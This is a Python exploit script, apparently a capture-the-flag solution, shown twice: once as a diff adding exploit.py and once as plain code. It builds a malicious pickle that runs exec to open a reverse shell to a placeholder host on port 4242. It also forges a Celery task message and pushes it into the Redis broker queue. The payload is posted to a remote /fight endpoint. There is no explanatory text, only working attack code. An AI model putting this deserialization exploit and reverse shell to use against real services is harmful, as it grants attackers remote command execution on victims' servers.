tyage · August 14, 2024 12:32
diff --git a/exploit.py b/exploit.py
 import pickle
 import base64
 import requests
 import json
 import os

 class P(object):
    def __reduce__(self):
        return (exec,('import socket,os,pty;s=socket.socket();s.connect(("xx.xx.xx.xx",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")',))

 arg = ([
    {'huntress_name': '1111', 'weapon_type': 'Fire', 'weapon_name': 'abc', 'test': P()}
  ], {}, {'callbacks': None, 'errbacks': None, 'chain': None, 'chord': None}
 )
 rce = base64.b64encode(pickle.dumps(arg)).decode()

 payload = "{\"body\": \""+rce+"\", \"content-encoding\": \"binary\", \"content-type\": \"application/x-python-serialize\", \"headers\": {\"lang\": \"py\", \"task\": \"app.tasks.go_on_a_journey\", \"id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"shadow\": null, \"eta\": null, \"expires\": null, \"group\": null, \"group_index\": null, \"retries\": 0, \"timelimit\": [null, null], \"root_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"parent_id\": null, \"argsrepr\": \"[]\", \"kwargsrepr\": \"{}\", \"origin\": \"gen90704@local\", \"ignore_result\": false, \"replaced_task_nesting\": 0, \"stamped_headers\": null, \"stamps\": {}}, \"properties\": {\"correlation_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"reply_to\": \"5eafeab0-d12b-3ab1-a4cd-e4fa791a2a64\", \"delivery_mode\": 2, \"delivery_info\": {\"exchange\": \"\", \"routing_key\": \"celery\"}, \"priority\": 0, \"body_encoding\": \"base64\", \"delivery_tag\": \"7db17528-39c5-4ff6-ae5a-dc3aa9c3f206\"}}"

 class P(object):
    def __reduce__(self):
        return (exec,('''
 import subprocess;
 import base64;
 cli = redis.StrictRedis.from_url(app.config["CELERY_BROKER_URL"]);
 result = cli.delete("celery");
 result = cli.lpush("celery", '{}');
 result = cli.lrange("celery", 0, -1);
 raise Exception(result);
 '''.format(payload),))


 payload = base64.b64encode(pickle.dumps(P())).decode()
 res = requests.post('https://huntresssockethunt-77c04986b4988c31f0e732c2b0b26a1e-0000.us-south.containers.appdomain.cloud/fight', json={
    'monsters': payload,
    'index': 0,
    'power': 50
 })
 data = json.loads(res.text)
 print(data['message'])
	import pickle
	import base64
	import requests
	import json
	import os

	class P(object):
	def __reduce__(self):
	return (exec,('import socket,os,pty;s=socket.socket();s.connect(("xx.xx.xx.xx",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")',))

	arg = ([
	{'huntress_name': '1111', 'weapon_type': 'Fire', 'weapon_name': 'abc', 'test': P()}
	], {}, {'callbacks': None, 'errbacks': None, 'chain': None, 'chord': None}
	)
	rce = base64.b64encode(pickle.dumps(arg)).decode()

	payload = "{\"body\": \""+rce+"\", \"content-encoding\": \"binary\", \"content-type\": \"application/x-python-serialize\", \"headers\": {\"lang\": \"py\", \"task\": \"app.tasks.go_on_a_journey\", \"id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"shadow\": null, \"eta\": null, \"expires\": null, \"group\": null, \"group_index\": null, \"retries\": 0, \"timelimit\": [null, null], \"root_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"parent_id\": null, \"argsrepr\": \"[]\", \"kwargsrepr\": \"{}\", \"origin\": \"gen90704@local\", \"ignore_result\": false, \"replaced_task_nesting\": 0, \"stamped_headers\": null, \"stamps\": {}}, \"properties\": {\"correlation_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"reply_to\": \"5eafeab0-d12b-3ab1-a4cd-e4fa791a2a64\", \"delivery_mode\": 2, \"delivery_info\": {\"exchange\": \"\", \"routing_key\": \"celery\"}, \"priority\": 0, \"body_encoding\": \"base64\", \"delivery_tag\": \"7db17528-39c5-4ff6-ae5a-dc3aa9c3f206\"}}"

	class P(object):
	def __reduce__(self):
	return (exec,('''
	import subprocess;
	import base64;
	cli = redis.StrictRedis.from_url(app.config["CELERY_BROKER_URL"]);
	result = cli.delete("celery");
	result = cli.lpush("celery", '{}');
	result = cli.lrange("celery", 0, -1);
	raise Exception(result);
	'''.format(payload),))


	payload = base64.b64encode(pickle.dumps(P())).decode()
	res = requests.post('https://huntresssockethunt-77c04986b4988c31f0e732c2b0b26a1e-0000.us-south.containers.appdomain.cloud/fight', json={
	'monsters': payload,
	'index': 0,
	'power': 50
	})
	data = json.loads(res.text)
	print(data['message'])